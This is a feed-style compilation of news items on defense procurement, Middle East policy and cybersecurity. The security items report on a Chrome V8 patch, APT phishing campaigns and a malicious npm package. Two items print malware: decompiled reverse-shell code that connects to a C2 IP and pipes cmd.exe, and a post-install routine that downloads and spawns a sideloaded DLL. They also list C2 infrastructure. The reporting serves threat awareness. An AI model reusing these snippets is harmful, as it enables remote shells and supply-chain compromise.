• Google has swiftly addressed a high-severity flaw in its Chrome browser’s V8 JavaScript engine, releasing an emergency update to thwart potential remote code execution attacks.

    The vulnerability, tracked as CVE-2025-12036, stems from an inappropriate implementation within V8, the open-source JavaScript and WebAssembly engine powering Chrome’s rendering capabilities.

    Discovered and reported internally by Google’s AI-driven security tool, Big Sleep, on October 15, 2025, the issue could allow malicious websites to execute arbitrary code on users’ devices without any interaction beyond visiting a compromised page.

    This patch arrives just days after the discovery, underscoring Google’s commitment to rapid response in browser security. The Stable channel update rolls out to version 141.0.7390.122/.123 for Windows and macOS users, and 141.0.7390.122 for Linux.

    Over the coming days and weeks, billions of Chrome users worldwide will receive this fix automatically, minimizing exposure. A detailed changelog highlights the security enhancements, though full bug details remain restricted until most users update to prevent exploitation.

    Chrome V8 JavaScript Engine Vulnerability

    At its core, V8 processes JavaScript code efficiently to enable dynamic web experiences, from interactive maps to online banking interfaces. However, the flaw in CVE-2025-12036 exploits a mishandled implementation that bypasses Chrome’s sandbox protections.

    Attackers could craft malicious scripts to read sensitive memory or inject code, potentially leading to data theft, malware installation, or full system compromise. Rated “High” severity, it aligns with past V8 vulnerabilities that have been weaponized in drive-by downloads and phishing campaigns.

    Security experts note this isn’t an isolated incident; V8 has been a frequent target due to its central role in web browsing.

    Google’s proactive detection via Big Sleep, a machine learning system scanning for anomalies, prevented the bug from reaching stable releases. The company also credits tools like AddressSanitizer and libFuzzer for ongoing fuzzing efforts that catch such issues early.

    This update reinforces the importance of timely patching in an era of escalating browser-based threats. With Chrome holding over 65% market share, vulnerabilities here ripple across the internet ecosystem.

    Users are urged to enable automatic updates and avoid suspicious sites. Google thanks external researchers for their contributions, emphasizing collaborative defenses against evolving attacks.

    As cyber threats grow more sophisticated, incidents like this highlight the need for AI-assisted vigilance in software development.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Chrome V8 JavaScript Engine Vulnerability Let Attackers Execute Remote Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Lockheed Martin is on track to deliver up to 190 F-35 fighter jets this year, and company executives expect the program to grow thanks to strong U.S. and international interest, they said during a third-quarter earnings call Tuesday. 

    “During the third quarter, we delivered 46 aircraft and now expect between 175 and 190 deliveries in 2025. That's essentially one aircraft delivery every working day of the year,” said Jim Taiclet, Lockheed Martin’s chairman, president, and CEO.

    The win comes after Lockheed Martin in July cleared its backlog of F-35s stored in long-term parking due to software problems, which caused a year-long pause in deliveries.

    The company also boasted a 12 percent increase in aeronautics sales compared to last year thanks to more F-35 production and sustainment. 

    “The recent lot 18 and 19 award re-emphasizes the growing demand for the F-35,” Taiclet said. “Moreover, we finalized the $15 billion air vehicle sustainment contract with the Joint Program Office. The four-year deal provides for aftermarket activities such as spare parts, provisioning maintenance, repair, and other support services through 2028.”

    Demand for the fighter jet has also grown worldwide, adding to expectations to produce a global fleet of more than 3,500 F-35s. 

    “International demand for the jet remains strong, with Belgium and Denmark both announcing intentions to expand their fleets. Belgium [is] seeking to procure an additional 11 aircraft, and Denmark [is] expressing interest in adding 16 aircraft to their existing program of record. The steady demand from our international allies for the F-35 demonstrates the unmatched capability of the aircraft and gives us confidence in sustained, long term production,” said Evan Scott, Lockheed Martin’s chief financial officer. 

    Germany has also indicated it wants to expand its F-35 fleet. 

    “We ended the third quarter with a backlog of 265 jets, and that's before adding the extra 151 that came in the first week of Q4. So we have seen strong support domestically and internationally,” Scott said. “The strong advocacy we've seen from lawmakers and the focus on air superiority from the administration, that gives us confidence in maintaining the 156 [deliveries] a year rate.”

    Sustainment will likely drive future program growth, especially as F-35s are updated with new technologies, such as with the Block 4 upgrades. 

    Taiclet said that while the tech integrations were complex and challenging, he is optimistic due to “the highest level of collaboration, cooperation” between the government, Lockheed, and F-35 suppliers, including RTX, BAE Systems, and Northrop Grumman

    “We have the best collaboration we've ever had and openness with the government, not only to work with us in a teamwork fashion across all of those companies and the U.S. government in the Joint Program Office, but also to remove barriers and delays on the government side, which heretofore hadn't been addressed that that aggressively, I'll say,” Taiclet said.“And so we're in a positive conversation with all the parties that are involved in this Block 4 modernization program, which is really, really important to keep everything on time, to keep the production line going. So I'm confident that we will have a successful block four rollout.”

    A recent Government Accountability Office report noted that Block 4 delays are about five years behind the original schedule, pushing the timeline to 2031 and increasing costs by more than $6 billion.

    “According to program officials, the new Block 4 major subprogram will have fewer capabilities, will experience schedule delays, and will have unknown costs until the program office finishes developing its cost estimate,” GAO said.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Shield AI’s new unmanned, vertical-takeoff-and-landing fighter jet concept is designed to be a drone wingman or a standalone aircraft, marking the latest autonomous aircraft announcement by defense companies in recent weeks.

    The X-BAT, revealed at a private event in Washington, D.C., on Tuesday evening, is Shield AI’s first unmanned fighter jet offering. The San Diego-based AI developer, coming off wins for testing and fielding its autonomous software on military aircraft, sees the fighter drone’s versatility to function as a robot wingman or as a standalone platform as one of its biggest strengths.

    “X-BAT’s ability to autonomously operate standalone or collaboratively allows it to project power when other assets aren’t around and simplifies kill chains,” Armor Harris, senior vice president of aircraft at Shield AI, said in a press release. 

    Shield AI plans to first test the aircraft’s vertical-takeoff-and-landing, capabilities by the fall of 2026, with a full flight test set for 2028, said Lily Hinz, a Shield AI spokesperson. The X-BAT marks the latest unmanned VTOL offering as the U.S. military and other nations continue to field drones and pivot away from runway-reliant aircraft. 

    Hinz said there’s no specific customer in mind for the unmanned aircraft, but the news release says the aircraft “integrates with current and future Air Force and Navy concepts” and also mentions that “three X–BATs fit in the deck space of one legacy fighter or helicopter.”

    Animated video of the X-BAT concept in action shows the group five sized-drone taking off vertically from a launchpad mounted on a trailer and lists cargo ships, aircraft carriers, and cleared landing zones as potential takeoff locations. Shield AI said in one of its videos that the aircraft’s 2,000 nautical mile range can be used for “island-hopping” missions.

    The X-BAT has been designed for strike, counter air, and electronic warfare as well as intelligence, surveillance, and reconnaissance missions. It’s being built to carry both air-to-air and air-to-surface munitions, videos provided by Shield AI to media outlets explained.

    Shield AI has already notched several milestones and collaborations with the U.S. military. The AI company has deployed and tested its V-BAT VTOL recon drones alongside Marines, and Ukrainian special operators have successfully used them to identify and later destroy Russian surface-to-air missile sites amid electronic warfare jamming attacks.

    Last year, Air Force Secretary Frank Kendall flew in an X-62A VISTA, a modified test aircraft, piloted by Shield AI’s software in a simulated dogfight with a manned F-16 fighter. The company, in collaboration with the Defense Advanced Research Projects Agency’s Air Combat Evolution Team, was a finalist for the 2023 Robert J. Collier Trophy by the National Aeronautics Association for those efforts.

    The AI company’s VTOL combat aircraft announcement follows announcements from Boeing and Lockheed Martin’s Sikorsky this month revealing their own unmanned VTOL aircraft platforms.

    The Navy and Air Force are both fielding Collaborative Combat Aircraft as drone wingmen. General Atomics announced Friday it was selected by the sea service to produce conceptual designs for its CCA efforts. The defense contractor is also competing for the Air Force’s CCA contract alongside Anduril. 

    Shield AI was reportedly selected to supply Anduril’s CCA offering for the Air Force with its autonomous capabilities. As Anduril and General Atomics compete for the Air Force’s production contract in 2026, service officials expect to award the next round, or increment, of CCA contracts within months.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated threat campaign has emerged targeting Russia’s public sector and critical industries between May and August 2025.

    The Cavalry Werewolf APT group, also known as YoroTrooper and Silent Lynx, has been actively deploying custom-built malware toolsets through highly targeted phishing operations that exploit trusted governmental relationships.

    The campaign focuses on organizations within energy, mining, and manufacturing sectors, leveraging two primary malware families designed for persistent access and command execution.

    The threat actors employ spear-phishing emails disguised as official correspondence from legitimate Kyrgyz government entities, including the Ministry of Economy and Commerce and the Ministry of Transport and Communications.

    These messages carry RAR archives containing either FoalShell reverse shell or StallionRAT remote access trojan, with filenames carefully crafted to mimic genuine official documents such as “three-month results of joint operations” or “shortlist of employees to receive bonuses.”

    The attackers blur the line between impersonation and actual compromise, with evidence suggesting they may have successfully breached real official email accounts to enhance their operational credibility.

    Picussecurity analysts identified that the malicious archives are typically downloaded to the %LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook directory, presenting a key detection opportunity for security teams monitoring Outlook cache activity.

    The sophistication of this campaign extends beyond social engineering tactics, incorporating multi-language malware implementations that demonstrate the group’s technical versatility and commitment to operational security.

    The threat actors have developed variants of their malware in C#, C++, Go, PowerShell, and Python, each designed to evade detection through different mechanisms while maintaining core command-and-control functionality.

    Desktop artifacts discovered during analysis indicate the group is preparing to expand beyond Russian targets, with files in Tajik language suggesting interest in Tajikistan and Arabic-named documents pointing toward potential Middle Eastern reconnaissance.

    The discovery of AsyncRAT installer files further highlights the group’s evolving toolkit and ambitious operational scope.

    FoalShell: Multi-Language Backdoor Architecture

    FoalShell represents a lightweight but effective reverse shell implementation designed to grant attackers command-line access through cmd.exe on compromised systems.

    The malware’s architecture varies across programming languages, with the C# version establishing straightforward TCP connections to command-and-control servers while maintaining stealth through hidden window styles.

    The core functionality operates through a continuous loop that receives commands, executes them via cmd.exe, and returns both standard and error output to the C2 infrastructure located at IP address 188.127.225.191 on port 443.

    The C++ variant employs more sophisticated evasion techniques through shellcode loading mechanisms.

    An obfuscated FoalShell shellcode is embedded within the executable’s resources under the name “output_bin,” which is extracted and executed in memory allocated with Read, Write, Execute permissions using VirtualAlloc.

    The shellcode then deobfuscates the main reverse shellcode before establishing network connectivity to C2 server 109.172.85.63.

    *(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");
    WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
    StartupInfo.dwFlags = 257;
    StartupInfo.hStdError = (HANDLE)s;
    StartupInfo.hStdOutput = (HANDLE)s;
    StartupInfo.hStdInput = (HANDLE)s;
    CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);

    The Go implementation utilizes its own networking stack to connect to C2 server 62.113.114.209 on port 443, forcing cmd.exe processes to run in hidden window states through the HideWindow parameter set to 1.

    This multi-language approach allows the attackers to adapt their deployment strategy based on target environment characteristics and security posture, making detection more challenging for traditional signature-based security solutions.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Cavalry Werewolf APT Hackers Attacking Multiple Industries with FoalShell and StallionRAT appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The federal shutdown has halted discussions about accelerating the B-21 bomber program, Northrop Grumman CEO Kathy Warden said Tuesday, six months after the company sank hundreds of millions of dollars into speeding up production.

    “We are in the midst of those discussions. They've been held up a bit because of the government shutdown and the availability of resources to continue those discussions during this time,” Warden said during the company’s third-quarter earnings call. “We expect those to resume.”

    Air Force spokespeople did not immediately return a request for comment. 

    In April, Northrop Grumman announced it took a nearly $500 million hit to increase production rates. The defense contractor has been working with the service after $4.5 billion aimed at increasing manufacturing for the B-21 bomber was approved this summer following the passage of the reconciliation bill.

    Warden said “in the coming months” the company expects to have more clarity on what accelerating production would look like. The Air Force has announced plans to buy 100 B-21 bombers, although some officials have made a pitch to field nearly 150 aircraft.

    The CEO said during the earnings call that the company has been working diligently on the B-21 program and expects awards tied to the low-rate initial production on the next bomber lots in the final quarter of 2025.

    “With the progress we've made, we remain on track to receive the LRIP lot three and lot five advanced procurement awards later this year,” Warden said. “We continue discussions with the Air Force on the framework for an agreement to accelerate the B-21 production rate.”

    Flight testing for the bomber began in November of 2023. Last month, a second B-21 aircraft test aircraft took flight. Ellsworth Air Force Base in South Dakota is set to receive the first aircraft.

    Warden said Northrop Grumman continues “to make good progress” on the Air Force’s behind-schedule, over-budget Sentinel ICBM. Just the day before, the company announced that the program had completed a critical design review for the Sentinel digital command and control infrastructure—marking a key milestone to build, test, and qualify the system.

    Last year, the Pentagon announced a substantial restructuring of the program after costs skyrocketed to $141 billion—81 percent above initial estimates. As a result, work was temporarily paused on Sentinel. The defense company announced in July it had resumed work on the launch facilities after the Air Force admitted it couldn’t reuse the existing Minuteman III launch silos and would have to dig hundreds of new holes instead.

    Tuesday marked 21 days into the government shutdown with no immediate resolution in sight between President Donald Trump’s administration and congressional Democrats. Amid the partisan gridlock, Warden said there’s still a bipartisan interest in national-security spending, and she seemed confident Northrop will emerge from the shutdown unscathed.

    “It is unclear how long it might persist, but we are hopeful it will be resolved in the near term,” she said. “Assuming it is, we do not anticipate any significant impact on our financial results. In the meantime, we remain focused on executing our programs and delivering on our commitment.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • To seal the recent Gaza peace deal, President Donald Trump asked Arab states to, once again, find a compromise with Israel. Despite Trump’s promises to the contrary, they had to accept seriously watered-down language on a future Palestinian state and a partial, rather than full, Israeli withdrawal from Gaza. Coming on the heels of Israel’s missile strike on Doha that also rattled Arab states, Trump may now feel all the more pressure to appease the United States’ Arab partners, like he did last month when he offered a formal security guarantee to Qatar (a first for any state in the Middle East) to quiet Arab doubts about U.S. reliability as a security partner. 

    Are more U.S. pledges now on the way?

    Saudi Arabia is pushing for a U.S. security deal, but taking on new commitments isn’t worth the real and potential costs to U.S. interests. Instead, Trump needs to stay focused on the heart of the problem and maintain pressure on Israel to curb its regional aggression. Coupled with Arab states shouldering the burden of their own security, pressure like this is best for ending conflict in the region.

    The United States has a bad habit of making new commitments to states in the Middle East when it wants to either expand or maintain regional order and peace. New pledges are the goodies Washington hands out to keep everyone in—or sometimes to expand—the fold.

    With the Abraham Accords, for instance, the United States committed sales of F-35 fighter jets, recognition of disputed territories, and financial support to get the United Arab Emirates, Bahrain, Sudan, and Morocco to normalize relations with Israel. Those pledges essentially greased the wheel for greater regional cooperation.

    Encouraging cooperation is a good thing, but not when it comes at the expense of U.S. national security, which the Trump administration must now put front and center as it considers how to manage relations with Arab states today.

    The United States is already overcommitted to the Middle East. It maintains upwards of 50,000 troops there (that’s up by nearly half since Hamas’ October 7 attack on Israel) despite the waning significance of the region to the United States.

    The two main strategic drivers of U.S. deep engagement in the Middle East over the last five decades—oil and terrorism—are no longer major strategic challenges. The U.S. is now a net exporter of oil, meaning it no longer depends on the region’s fossil fuels; and with the defeat of the ISIS caliphate in 2019 and general weakening of al-Qaeda, the terrorism threat can be mostly handled by local actors.

    In short, Washington is giving the Middle East far too much. It shouldn’t now give even more to tamp down frustrations over the Gaza deal and the Doha strike, or more broadly to try to bring some permanent, transformative fix to the troubled region, which appears to be Trump’s greater ambition. Rather than step deeper into the Middle East, Washington needs to step back. 

    Under similar circumstances, President Joe Biden considered giving Saudi Arabia a NATO-like security guarantee to get Riyadh to come onboard with the Abraham Accords. Riyadh asked for the pledge because, similar to Qatar today, the United States provided no military defense of Saudi Arabia after a 2019 attack by Yemen’s Houthi rebels on two Saudi oil refineries. Right on cue, Biden offered up the security pledge to grease the wheels of regional cooperation.

    Trump just followed Biden’s playbook with Qatar—and might follow that playbook again with new security pledges across the region to appease Arab states post-Gaza and expand the Abraham Accords. This makes little sense, given limited U.S. interests in the Middle East; and it runs counter to the Trump administration’s own strategy of shifting forces out of the region to focus attention on Asia and the Western Hemisphere where the United States has far more at stake. More commitments mean the forces stay too to uphold those commitments.

    Trump needs to make clear to the Qataris the limits of this new pledge, and avoid doling out more of them to other Arab partners. This would not only help the United States, but would likely benefit the Middle East too. The U.S. decision not to defend Saudi Arabia militarily after the Houthi attack in 2019 forced Riyadh to recognize that it had to bear more of the burden of its own security. The result? It ended its brutal, costly military operations in Yemen. This isn’t an isolated case. From Iran to post-Assad Syria, we’ve seen other similar instances of peace and stability when the U.S. draws back.

    Trump should also maintain pressure on Tel Aviv (which he finally used to push Israel into the Gaza peace deal) to tone down its regional aggression. As opposed to doling out goodies, this has worked best to calm Middle East tensions of late. Keeping that pressure up now will help tame regional strikes, like Doha, that led Trump to make the pledge to Qatar in the first place.

    In general, Trump can get the regional stability and order he wants in the Middle East by doing less, not more. Stepping back, rather than stepping farther into, the Middle East just makes sense.

    Will Walldorf is a Professor at Wake Forest University and Senior Fellow at Defense Priorities.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cheap, self-driving drones that don’t require a whole fire team to launch them are a cornerstone of the Army’s forthcoming UAS strategy, which will focus on “universal interoperability and autonomy,” according to the service’s top aviator.

    The service’s next generation of drone training and operation will include a new military occupational specialty that merges operators and maintainers, as well as a new advanced course that standardizes training across the force. Right now, they’re looking for software that will enable drones to take orders rather than be flown.

    “You know, gone are the days where a drone operator is actually being a pilot, where they have to be hands on the sticks all the time,” Maj. Gen. Clair Gill said at last week’s AUSA annual meeting in Washington, D.C. “Now we've got autonomous capability where we can even use large language models to tell it what to do — but we basically program it, tell it what to do, and then, you know, the algorithms, in a very disciplined fashion, execute it.”

    Right now, it takes four soldiers to launch a drone ambush, the deputy commanding general of the 101st Airborne Division said, with one flying it, one pulling security, someone carrying the equipment, and someone setting up antennas.

    But “that’s the wrong math,” Brig. Gen. Travis McIntosh said on the same panel. “Let me give you a threshold that's easy to understand: when we can fly drones by command, not by pilot. When your drones can understand commander's intent—that, ladies and gentlemen, is the threshold for AI autonomy to help us.”

    McIntosh’s soldiers recently debuted a homegrown drone dubbed Attritable Battle Field Enabler 101—or ABE, named after the “screaming eagle” mascot of the 101st. Instead of the $2,500-a-pop commercial drones on the market, McIntosh said, his troops are training on this cheaper $740 model.

    Now they need a software program that can fly the drone and help it make decisions about where to drop grenades.

    “We've also laid the foundation today for an uncrewed vehicle control software capability that's able to provide common software interface, common view, if you will, and common control to UAS across the board,” said Brig. Gen. David Phillips, head of the Army’s Program Executive Office for aviation.

    At the same time, Gill said, the Army has finished a draft of its forthcoming UAS strategy.

    Some changes already underway include a new MOS, 15X, that will combine the 15W drone operator and 15E drone maintainer jobs.

    “I can't overstate or underscore enough the cultural shift that had to take place for these 15-series soldiers, because the 15X is designed to be embedded in maneuver elements, so they need to be able to operate in the same capacity as [those] combat arms soldiers standing next to them,” he said.

    Gill’s team at Fort Rucker, Alabama, has also developed what they’re calling the UAS Advanced Lethality Course, where soldiers from backgrounds in infantry, artillery, cyber, Special Forces, armor and more will learn how to operate drones with the Army’s latest doctrine. 

    “We're getting ready to run our second iteration,” he said. “As soon as we get the government going again, we're ready to export that course.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

    Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

    This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

    The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

    The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

    Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

    Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

    As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

    Infection Mechanism: OS-Specific Adaptation

    A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

    For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

    Metadata for the malicious (left) and legitimate (right) packages (Source – Securelist)

    Below is a deobfuscated snippet employed for Windows deployment:-

    async function onWindows() {
      const url = 'https://cloudcenter.topsysupdate';
      const dllPath = 'C:\\.dll';
      const systemMsdtc = 'C:\\32.exe';
      const tasksMsdtc = 'C:\\.exe';
      try {
        await downloadFile(url, dllPath);
        fs.copyFileSync(systemMsdtc, tasksMsdtc);
        const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
        child.unref();
      } catch (err) {
        console.error(err);
      }
    }

    This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

    Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

    The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

    The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

    By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

    This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

    Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

    The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

    Infrastructure and Technical Indicators

    The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

    The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

    Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

    This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

    Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.​

    Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

    This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.​

    Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

    The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.​

    Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.​

    Five Strategies for Cost Savings with Threat Intelligence

    TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

    ​Preventing Breaches Proactively

    Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

    Platforms such as ANY.RUN provides 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.​

    Eliminating False Positive Waste

    TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

    ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.​

    Cutting Labor Costs Through Automated Triage

    Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

    ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.​

    Accelerating Response to Limit Damage

    TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

    ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.​

    Maintaining Up-to-Date Defenses Effortlessly

    Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

    ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.​

    It eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.​

    Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.​

    Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.​

    Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.​

    An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

    Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.​

    Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.

    Build Stronger Security With Fresh TI Data From 500,000 Analysts => Try Now

    The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶